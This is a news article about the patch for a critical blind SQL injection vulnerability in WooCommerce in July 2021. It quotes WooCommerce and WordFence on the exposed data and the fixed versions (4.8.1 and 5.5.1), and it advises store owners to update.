WooCommerce has announced a patch for a critical vulnerability impacting millions of users. Publishers using the WooCommerce plugin or WooCommerce Blocks plugin are strongly advised to update their plugins if they have not yet done so automatically.
WooCommerce Enforces Automatic Update
The SQL Injection Vulnerability is deemed so severe that WooCommerce is automatically pushing updates to affected publishers. Despite automatic updates, some publishers report that their sites have not yet received the update. Therefore, it’s important to check and manually update if necessary.
WooCommerce SQL Injection Vulnerability
A SQL Injection allows a malicious hacker to manipulate a database in unintended ways, potentially revealing sensitive information such as passwords. According to WooCommerce:
"If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information."
WordFence’s announcement noted that this is a Blind SQL Injection vulnerability. WordFence explained the impact:
"This vulnerability allowed unauthenticated attackers to access arbitrary data in an online store’s database."
"The WordFence Threat Intelligence team was able to develop proofs of concept for time-based and boolean-based blind injections and released an initial firewall rule to our Premium customers within hours of the patch."
Have WooCommerce Sites Been Compromised?
Currently, there is no evidence of widespread attacks compromising WooCommerce sites. WordFence stated:
"WordFence Threat Intelligence has found extremely limited evidence of these attempts and it is likely that such attempts were highly targeted."
WooCommerce Software Version Branches
Version branches are numbered according to the version a publisher is using, with versions such as 3.x, 4.x, and the latest 5.x considered branches. WooCommerce versions 4.x and 5.x are called branches of the software, with version 5 being a major step up from version 4.
Some publishers may find it disruptive to update from version 4.x to 5.x. To accommodate these publishers, WooCommerce released a patch that addresses the vulnerability for each branch. Sites with WooCommerce version 4.x should update to at least version 4.8.1, the latest in the 4.x branch.
However, the official announcement recommends updating to the latest version of WooCommerce, currently version 5.5.1:
"…we still highly recommend you ensure that you’re using the latest versions of WooCommerce and WooCommerce Blocks (5.5.1)."
This recommendation has caused some confusion among publishers regarding how far up the version branch they should update. One user asked if version 4.8.1 is safe, to which WooCommerce responded:
"As this critical vulnerability concerns the WooCommerce plugin, we highly recommend ensuring this is up to date first."
"The version you mention, 4.8.1, contains the security patch so there’s nothing else you need to do here until you’re ready to update to the latest version (5.5.1)."
Citations
Official WooCommerce Announcement
Critical Vulnerability Detected in WooCommerce on July 13, 2021 – What You Need to Know
WordFence Report and Analysis of the Vulnerability
Critical SQL Injection Vulnerability Patched in WooCommerce
